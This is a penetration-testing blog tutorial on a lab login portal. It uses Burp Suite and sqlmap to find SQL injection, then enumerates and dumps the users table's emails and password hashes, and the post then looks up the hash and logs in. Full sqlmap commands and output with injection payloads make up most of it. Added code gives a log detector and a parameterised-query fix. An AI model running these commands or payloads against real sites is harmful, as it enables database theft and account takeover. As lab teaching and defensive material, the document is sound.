How To Dump Username And Password Using SQLMap Tool?
Table of Contents
- What is sqlmap in Kali?
- Dump Username And Password Using SQLMap
What is sqlmap in Kali?
SQLMap is an open-source tool used to both identify and exploit SQL injection vulnerabilities. It has many advanced features, such as dumping usernames and passwords from a remote website's database and bypassing a WAF (Web Application Firewall).
Dump Username And Password Using Sqlmap
In this blog we are going to introduce the SQLMap tool, which is the most popular tool of its kind. Using it, we will dump the usernames and passwords from a remote website.
Let's begin. We have opened the login page of the Europa Corp admin portal. Keep in mind that this is a virtual (lab) environment. Don't try to attack this website.
Let's put in a random email and password. First, we will intercept this traffic using Burp Suite, which comes pre-installed in Kali Linux.
We have intercepted the login request to the Europa Corp admin portal using Burp Suite. Let's copy the whole request and save it in a file called sql.req.
The sql.req file looks like this. Let's open it using the cat command, which comes pre-installed in Kali Linux.
Before using sqlmap, keep in mind that this website uses HTTPS (Hypertext Transfer Protocol Secure). If you don't add the --force-ssl option, sqlmap can fail with an SSL error. In this first step we will retrieve the database names using the --dbs option.
sqlmap -r sql.req --force-ssl --dbs
{1.6.1.1#dev}
https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:59:46 /2022-01-16/

[23:59:46] [INFO] parsing HTTP request from 'sql.req'
[23:59:46] [INFO] resuming back-end DBMS 'mysql'
[23:59:46] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: email=admin@europacorp.htb' RLIKE (SELECT (CASE WHEN (5462=5462) THEN 0x61646d696e406575726f7061636f72702e687462 ELSE 0x28 END))-- uqLz&password=password

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: email=admin@europacorp.htb' AND GTID_SUBSET(CONCAT(0x7178627671,(SELECT (ELT(6429=6429,1))),0x716a787871),6429)-- gHDo&password=password

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=admin@europacorp.htb' AND (SELECT 4034 FROM (SELECT(SLEEP(5)))WwrX)-- frlv&password=password
---
[23:59:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL 5
[23:59:48] [INFO] fetching database names
[23:59:48] [INFO] resumed: 'information_schema'
[23:59:48] [INFO] resumed: 'admin'
available databases [2]:
[*] admin
[*] information_schema

[23:59:48] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb'

[*] ending @ 23:59:48 /2022-01-16/
Our first mission completed successfully: we have the database names of the remote website. Let's now list all tables inside the admin database with the following command.
sqlmap -r sql.req --force-ssl -D admin --tables
{1.6.1.1#dev}
https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 00:03:09 /2022-01-17/

[00:03:09] [INFO] parsing HTTP request from 'sql.req'
[00:03:10] [INFO] resuming back-end DBMS 'mysql'
[00:03:10] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: email=admin@europacorp.htb' RLIKE (SELECT (CASE WHEN (5462=5462) THEN 0x61646d696e406575726f7061636f72702e687462 ELSE 0x28 END))-- uqLz&password=password

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: email=admin@europacorp.htb' AND GTID_SUBSET(CONCAT(0x7178627671,(SELECT (ELT(6429=6429,1))),0x716a787871),6429)-- gHDo&password=password

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=admin@europacorp.htb' AND (SELECT 4034 FROM (SELECT(SLEEP(5)))WwrX)-- frlv&password=password
---
[00:03:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL 5
[00:03:11] [INFO] fetching tables for database: 'admin'
[00:03:11] [INFO] resumed: 'users'
Database: admin
[1 table]
+-------+
| users |
+-------+

[00:03:11] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb'

[*] ending @ 00:03:11 /2022-01-17/
We have the table name inside the admin database. Let's now list all columns of the users table.
sqlmap -r sql.req --force-ssl -D admin -T users --columns
{1.6.1.1#dev}
https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 00:05:52 /2022-01-17/

[00:05:52] [INFO] parsing HTTP request from 'sql.req'
[00:05:53] [INFO] resuming back-end DBMS 'mysql'
[00:05:53] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: email=admin@europacorp.htb' RLIKE (SELECT (CASE WHEN (5462=5462) THEN 0x61646d696e406575726f7061636f72702e687462 ELSE 0x28 END))-- uqLz&password=password

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: email=admin@europacorp.htb' AND GTID_SUBSET(CONCAT(0x7178627671,(SELECT (ELT(6429=6429,1))),0x716a787871),6429)-- gHDo&password=password

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=admin@europacorp.htb' AND (SELECT 4034 FROM (SELECT(SLEEP(5)))WwrX)-- frlv&password=password
---
[00:05:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL 5
[00:05:54] [INFO] fetching columns for table 'users' in database 'admin'
[00:05:54] [INFO] resumed: 'id'
[00:05:54] [INFO] resumed: 'int(11)'
[00:05:54] [INFO] resumed: 'username'
[00:05:54] [INFO] resumed: 'varchar(255)'
[00:05:54] [INFO] resumed: 'email'
[00:05:54] [INFO] resumed: 'varchar(255)'
[00:05:54] [INFO] resumed: 'password'
[00:05:54] [INFO] resumed: 'varchar(255)'
[00:05:54] [INFO] resumed: 'active'
[00:05:54] [INFO] resumed: 'tinyint(1)'
Database: admin
Table: users
[5 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| active   | tinyint(1)   |
| email    | varchar(255) |
| id       | int(11)      |
| password | varchar(255) |
| username | varchar(255) |
+----------+--------------+

[00:05:54] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb'

[*] ending @ 00:05:54 /2022-01-17/
We have the column names of the users table. Let's dump the email and password columns with the following command.
sqlmap -r sql.req --force-ssl -D admin -T users -C email,password --dump
{1.6.1.1#dev}
https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 00:08:33 /2022-01-17/

[00:08:33] [INFO] parsing HTTP request from 'sql.req'
[00:08:34] [INFO] resuming back-end DBMS 'mysql'
[00:08:34] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: email=admin@europacorp.htb' RLIKE (SELECT (CASE WHEN (5462=5462) THEN 0x61646d696e406575726f7061636f72702e687462 ELSE 0x28 END))-- uqLz&password=password

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: email=admin@europacorp.htb' AND GTID_SUBSET(CONCAT(0x7178627671,(SELECT (ELT(6429=6429,1))),0x716a787871),6429)-- gHDo&password=password

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=admin@europacorp.htb' AND (SELECT 4034 FROM (SELECT(SLEEP(5)))WwrX)-- frlv&password=password
---
[00:08:36] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL 5
[00:08:36] [INFO] fetching entries of column(s) 'email,password' for table 'users' in database 'admin'
[00:08:38] [INFO] retrieved: 'admin@europacorp.htb'
[00:08:39] [INFO] retrieved: '2b6d315337f18617ba18922c0b9597ff'
[00:08:40] [INFO] retrieved: 'john@europacorp.htb'
[00:08:42] [INFO] retrieved: '2b6d315337f18617ba18922c0b9597ff'
[00:08:42] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: admin
Table: users
[2 entries]
+----------------------+----------------------------------+
| email                | password                         |
+----------------------+----------------------------------+
| admin@europacorp.htb | 2b6d315337f18617ba18922c0b9597ff |
| john@europacorp.htb  | 2b6d315337f18617ba18922c0b9597ff |
+----------------------+----------------------------------+

[00:08:46] [INFO] table 'admin.users' dumped to CSV file '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb/dump/admin/users.csv'
[00:08:46] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb'

[*] ending @ 00:08:46 /2022-01-17/
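The three injection techniques sqlmap reported above (RLIKE boolean-based, GTID_SUBSET error-based, SLEEP time-based) leave recognisable shapes in the request body, which is what a defender would alert on. The following is an added example, not part of the original post: a small detector run over constructed application-log lines (already URL-decoded, with the post's own payloads pasted in); the log format and the classify_body/scan_log functions are assumptions.

```python
import re
from urllib.parse import parse_qs

# Markers for the three techniques sqlmap reported against the email field,
# plus the quote + "-- xxxx" comment tail that every payload shared.
MARKERS = {
    "boolean-blind": re.compile(r"'\s*RLIKE\s*\(SELECT", re.I),
    "error-based":   re.compile(r"GTID_SUBSET\s*\(\s*CONCAT", re.I),
    "time-blind":    re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "comment-tail":  re.compile(r"'.*--\s*\w*$"),
}

# Constructed log lines (hypothetical app-log format, bodies already URL-decoded).
SAMPLE_LOG = """\
2022-01-17T00:05:53 POST /login.php 200 body="email=user@europacorp.htb&password=hunter2"
2022-01-17T00:05:54 POST /login.php 200 body="email=admin@europacorp.htb' RLIKE (SELECT (CASE WHEN (5462=5462) THEN 0x61646d696e406575726f7061636f72702e687462 ELSE 0x28 END))-- uqLz&password=password"
2022-01-17T00:05:54 POST /login.php 500 body="email=admin@europacorp.htb' AND GTID_SUBSET(CONCAT(0x7178627671,(SELECT (ELT(6429=6429,1))),0x716a787871),6429)-- gHDo&password=password"
2022-01-17T00:05:59 POST /login.php 200 body="email=admin@europacorp.htb' AND (SELECT 4034 FROM (SELECT(SLEEP(5)))WwrX)-- frlv&password=password"
"""

BODY_RE = re.compile(r'body="([^"]*)"')


def classify_body(body: str) -> dict:
    """Return {form_field: [technique, ...]} for every field that trips a marker."""
    hits = {}
    for param, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            found = [name for name, rx in MARKERS.items() if rx.search(value)]
            if found:
                hits.setdefault(param, []).extend(found)
    return hits


def scan_log(lines) -> list:
    """Return [(1-based line number, hits)] for lines whose body looks like sqlmap output."""
    flagged = []
    for lineno, line in enumerate(lines, 1):
        m = BODY_RE.search(line)
        if not m:
            continue
        hits = classify_body(m.group(1))
        if hits:
            flagged.append((lineno, hits))
    return flagged


if __name__ == "__main__":
    for lineno, hits in scan_log(SAMPLE_LOG.splitlines()):
        print(f"line {lineno}: {hits}")
```

A single request matching one of these markers is enough to investigate; a burst of them against one login endpoint with a changing comment tail is the usual fingerprint of an automated scan.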
Boom! We have the email addresses and passwords from the remote website, but the passwords are stored as hashes rather than in clear text (sqlmap itself flagged them as possible password hashes). Most modern websites store hashed passwords in the database. But I am lazy. To look up the user hashes, we will use the dcode website.
Let's put the recovered credentials in the email and password fields. After that, we get a 302 redirect from the remote website.
Take a closer look at the image below.
Login successful!
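Why the email field was injectable, and what closes it, as an added example that is not the portal's code (which is not on the page): an in-memory SQLite stand-in for admin.users, a login query built by string concatenation that the post's boolean-based probe (the CASE WHEN (5462=5462) test) can steer past the password check, and the parameterised form that treats the same string as an ordinary email. SQLite has no RLIKE, so a CASE expression stands in for the post's payload; the identical hash for both users in the dump is the signature of an unsalted hash, and the stand-in keeps that only so its rows match the post.

```python
import hashlib
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the admin.users table (hypothetical schema, made-up password)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, email TEXT, password TEXT, active INTEGER)")
    pw_hash = hashlib.md5(b"constructed-password").hexdigest()  # unsalted, as in the dump
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)",
                   [(1, "admin", "admin@europacorp.htb", pw_hash, 1),
                    (2, "john", "john@europacorp.htb", pw_hash, 1)])
    return db


def login_vulnerable(db, email: str, password: str):
    # The email value is pasted into the SQL text, so a quote ends the literal and
    # a trailing "--" comments out the password comparison entirely.
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = f"SELECT username FROM users WHERE email='{email}' AND password='{pw_hash}'"
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_hardened(db, email: str, password: str):
    # Parameterised query: the driver passes the email as data, never as SQL.
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    row = db.execute("SELECT username FROM users WHERE email=? AND password=?",
                     (email, pw_hash)).fetchone()
    return row[0] if row else None


# Boolean-based probes in the shape of the post's first payload: a true and a false
# condition. The vulnerable login answers them differently, which is the side channel
# sqlmap's "boolean-based blind" technique reads one bit at a time.
TRUE_PROBE = "admin@europacorp.htb' AND (CASE WHEN (5462=5462) THEN 1 ELSE 0 END)-- uqLz"
FALSE_PROBE = "admin@europacorp.htb' AND (CASE WHEN (5462=5463) THEN 1 ELSE 0 END)-- uqLz"


def demo() -> dict:
    db = make_db()
    return {
        "vuln_true": login_vulnerable(db, TRUE_PROBE, "wrong"),     # "admin": logged in with no password
        "vuln_false": login_vulnerable(db, FALSE_PROBE, "wrong"),   # None: the oracle's other answer
        "hard_true": login_hardened(db, TRUE_PROBE, "wrong"),       # None: no such email
        "hard_false": login_hardened(db, FALSE_PROBE, "wrong"),     # None: no such email
        "hard_legit": login_hardened(db, "admin@europacorp.htb", "constructed-password"),  # "admin"
    }


if __name__ == "__main__":
    print(demo())
```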
The post How To Dump Username And Password Using SQLMap Tool? appeared first on Pentestblog.